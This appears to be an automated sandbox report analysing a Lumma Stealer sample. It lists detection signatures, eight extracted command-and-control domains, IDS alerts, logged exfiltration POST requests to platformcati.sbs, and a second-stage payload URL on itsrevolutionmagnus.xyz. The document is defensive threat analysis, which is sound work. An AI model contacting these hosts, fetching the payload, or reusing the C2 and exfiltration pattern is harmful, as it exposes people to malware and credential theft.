Edit tour

Windows Analysis Report
h226x41CQ6.exe

Overview

General Information

Sample name:h226x41CQ6.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:fc8506934f3f379af5f36cdccb0c17ca
Analysis ID:1600405
MD5:fc8506934f3f379af5f36cdccb0c17ca
SHA1:3bccadfcc48c2116389c53714e3be076592731b4
SHA256:5bd0a7c399000541ab5f7398af02d5ced96e4f3adcea59a63c35dcf890bdc8de
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
LummaC encrypted strings found
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • h226x41CQ6.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\h226x41CQ6.exe" MD5: FC8506934F3F379AF5F36CDCCB0C17CA)
    • h226x41CQ6.exe (PID: 7392 cmdline: "C:\Users\user\Desktop\h226x41CQ6.exe" MD5: FC8506934F3F379AF5F36CDCCB0C17CA)
    • WerFault.exe (PID: 7572 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7260 -s 260 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{
  "C2 url": [
    "pioneeruyj.sbs",
    "nervepianoyo.sbs",
    "conceptionnyi.sbs",
    "fightyglobo.sbs",
    "modellydivi.sbs",
    "smashygally.sbs",
    "platformcati.sbs",
    "qualifielgalt.sbs"
  ],
  "Build id": "H8NgCl--"
}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000004.00000003.1559487979.00000000012BD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000003.1557986513.00000000012BC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000003.1543311993.00000000012BC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000004.00000003.1528754817.00000000012BD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000004.00000003.1530149419.00000000012BC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 4 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-27T14:54:13.879270+010020283713Unknown Traffic192.168.2.749702104.21.112.1443TCP
                2025-01-27T14:54:15.356568+010020283713Unknown Traffic192.168.2.749703104.21.112.1443TCP
                2025-01-27T14:54:16.739157+010020283713Unknown Traffic192.168.2.749705104.21.112.1443TCP
                2025-01-27T14:54:40.121324+010020283713Unknown Traffic192.168.2.749838104.21.112.1443TCP
                2025-01-27T14:54:41.576040+010020283713Unknown Traffic192.168.2.749849104.21.112.1443TCP
                2025-01-27T14:54:43.214282+010020283713Unknown Traffic192.168.2.749860104.21.112.1443TCP
                2025-01-27T14:54:46.133395+010020283713Unknown Traffic192.168.2.749871104.21.112.1443TCP
                2025-01-27T14:54:48.988318+010020283713Unknown Traffic192.168.2.749892104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-27T14:54:14.198569+010020546531A Network Trojan was detected192.168.2.749702104.21.112.1443TCP
                2025-01-27T14:54:15.863766+010020546531A Network Trojan was detected192.168.2.749703104.21.112.1443TCP
                2025-01-27T14:54:49.797125+010020546531A Network Trojan was detected192.168.2.749892104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-27T14:54:14.198569+010020498361A Network Trojan was detected192.168.2.749702104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-27T14:54:15.863766+010020498121A Network Trojan was detected192.168.2.749703104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-27T14:54:13.879270+010020567071Domain Observed Used for C2 Detected192.168.2.749702104.21.112.1443TCP
                2025-01-27T14:54:15.356568+010020567071Domain Observed Used for C2 Detected192.168.2.749703104.21.112.1443TCP
                2025-01-27T14:54:16.739157+010020567071Domain Observed Used for C2 Detected192.168.2.749705104.21.112.1443TCP
                2025-01-27T14:54:40.121324+010020567071Domain Observed Used for C2 Detected192.168.2.749838104.21.112.1443TCP
                2025-01-27T14:54:41.576040+010020567071Domain Observed Used for C2 Detected192.168.2.749849104.21.112.1443TCP
                2025-01-27T14:54:43.214282+010020567071Domain Observed Used for C2 Detected192.168.2.749860104.21.112.1443TCP
                2025-01-27T14:54:46.133395+010020567071Domain Observed Used for C2 Detected192.168.2.749871104.21.112.1443TCP
                2025-01-27T14:54:48.988318+010020567071Domain Observed Used for C2 Detected192.168.2.749892104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-27T14:54:13.379336+010020567061Domain Observed Used for C2 Detected192.168.2.7613251.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-27T14:54:45.046611+010020480941Malware Command and Control Activity Detected192.168.2.749860104.21.112.1443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: h226x41CQ6.exeAvira: detected
                Source: qualifielgalt.sbsAvira URL Cloud: Label: malware
                Source: https://platformcati.sbs/apieIAvira URL Cloud: Label: malware
                Source: https://platformcati.sbs/SAvira URL Cloud: Label: malware
                Source: pioneeruyj.sbsAvira URL Cloud: Label: malware
                Source: https://platformcati.sbs/api?Avira URL Cloud: Label: malware
                Source: fightyglobo.sbsAvira URL Cloud: Label: malware
                Source: https://platformcati.sbs/apipAvira URL Cloud: Label: malware
                Source: conceptionnyi.sbsAvira URL Cloud: Label: malware
                Source: nervepianoyo.sbsAvira URL Cloud: Label: malware
                Source: https://itsrevolutionmagnus.xyz/Avira URL Cloud: Label: malware
                Source: https://platformcati.sbs/api(wAvira URL Cloud: Label: malware
                Source: https://itsrevolutionmagnus.xyz/aAvira URL Cloud: Label: malware
                Source: smashygally.sbsAvira URL Cloud: Label: malware
                Source: https://itsrevolutionmagnus.xyz/Pa/Avira URL Cloud: Label: malware
                Source: https://itsrevolutionmagnus.xyz/Shnnfd.exe%Avira URL Cloud: Label: malware
                Source: modellydivi.sbsAvira URL Cloud: Label: malware
                Source: platformcati.sbsAvira URL Cloud: Label: malware
                Source: https://itsrevolutionmagnus.xyz/Shnnfd.exeAvira URL Cloud: Label: malware
                Source: https://platformcati.sbs/#HXAvira URL Cloud: Label: malware
                Source: https://platformcati.sbs/apizAvira URL Cloud: Label: malware
                Source: https://platformcati.sbs/apiAvira URL Cloud: Label: malware
                Source: https://platformcati.sbs/api~Avira URL Cloud: Label: malware
                Source: https://platformcati.sbs/Avira URL Cloud: Label: malware
                Source: https://platformcati.sbs/hAvira URL Cloud: Label: malware
                Source: h226x41CQ6.exe.7260.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["pioneeruyj.sbs", "nervepianoyo.sbs", "conceptionnyi.sbs", "fightyglobo.sbs", "modellydivi.sbs", "smashygally.sbs", "platformcati.sbs", "qualifielgalt.sbs"], "Build id": "H8NgCl--"}
                Source: h226x41CQ6.exeVirustotal: Detection: 79%Perma Link
                Source: h226x41CQ6.exeReversingLabs: Detection: 86%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: h226x41CQ6.exeJoe Sandbox ML: detected
                Source: h226x41CQ6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49838 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49849 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49860 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49871 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49892 version: TLS 1.2
                Source: h226x41CQ6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2056706 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (platformcati .sbs) : 192.168.2.7:61325 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2056707 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) : 192.168.2.7:49702 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2056707 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) : 192.168.2.7:49703 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2056707 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) : 192.168.2.7:49705 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2056707 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) : 192.168.2.7:49838 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2056707 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) : 192.168.2.7:49849 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2056707 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) : 192.168.2.7:49860 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2056707 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) : 192.168.2.7:49871 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2056707 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) : 192.168.2.7:49892 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49702 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49702 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49703 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49703 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49892 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49860 -> 104.21.112.1:443
                Source: Malware configuration extractorURLs: pioneeruyj.sbs
                Source: Malware configuration extractorURLs: nervepianoyo.sbs
                Source: Malware configuration extractorURLs: conceptionnyi.sbs
                Source: Malware configuration extractorURLs: fightyglobo.sbs
                Source: Malware configuration extractorURLs: modellydivi.sbs
                Source: Malware configuration extractorURLs: smashygally.sbs
                Source: Malware configuration extractorURLs: platformcati.sbs
                Source: Malware configuration extractorURLs: qualifielgalt.sbs
                Source: DNS query: itsrevolutionmagnus.xyz
                Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49705 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49838 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49849 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49860 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49871 -> 104.21.112.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49892 -> 104.21.112.1:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: platformcati.sbs
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: platformcati.sbs
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12839Host: platformcati.sbs
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15071Host: platformcati.sbs
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20396Host: platformcati.sbs
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2451Host: platformcati.sbs
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 553130Host: platformcati.sbs
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: platformcati.sbs
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: platformcati.sbs
                Source: global trafficDNS traffic detected: DNS query: itsrevolutionmagnus.xyz
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: platformcati.sbs
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 27 Jan 2025 13:54:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ytAmym0fDG84%2BuNPN9G4V3Rqn5msHjz4g%2FlpdzaN3F09tKJaR8IZSx5%2FGdW5Q52YGbKIR9uzHM7NF2oJkJpOrJIQwf563tdd%2BX90LASK1N12ukWzU1ZUtSPT3kRsVfAyzuLc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90893bc64a38424b-EWR
                Source: h226x41CQ6.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: h226x41CQ6.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: h226x41CQ6.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: h226x41CQ6.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: h226x41CQ6.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: h226x41CQ6.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: h226x41CQ6.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: h226x41CQ6.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: h226x41CQ6.exeString found in binary or memory: http://ocsp.digicert.com0
                Source: h226x41CQ6.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: h226x41CQ6.exeString found in binary or memory: http://ocsp.entrust.net02
                Source: h226x41CQ6.exeString found in binary or memory: http://ocsp.entrust.net03
                Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
                Source: h226x41CQ6.exeString found in binary or memory: http://www.digicert.com/CPS0
                Source: h226x41CQ6.exeString found in binary or memory: http://www.entrust.net/rpa03
                Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: h226x41CQ6.exe, 00000004.00000003.1543175665.0000000003C4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                Source: h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdve
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://itsrevolutionmagnus.xyz/
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://itsrevolutionmagnus.xyz/Pa/
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://itsrevolutionmagnus.xyz/Shnnfd.exe
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://itsrevolutionmagnus.xyz/Shnnfd.exe%
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://itsrevolutionmagnus.xyz/a
                Source: h226x41CQ6.exe, 00000004.00000003.1528684635.0000000003B53000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528737340.0000000003B5C000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528704318.0000000003B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://platformcati.sbs/
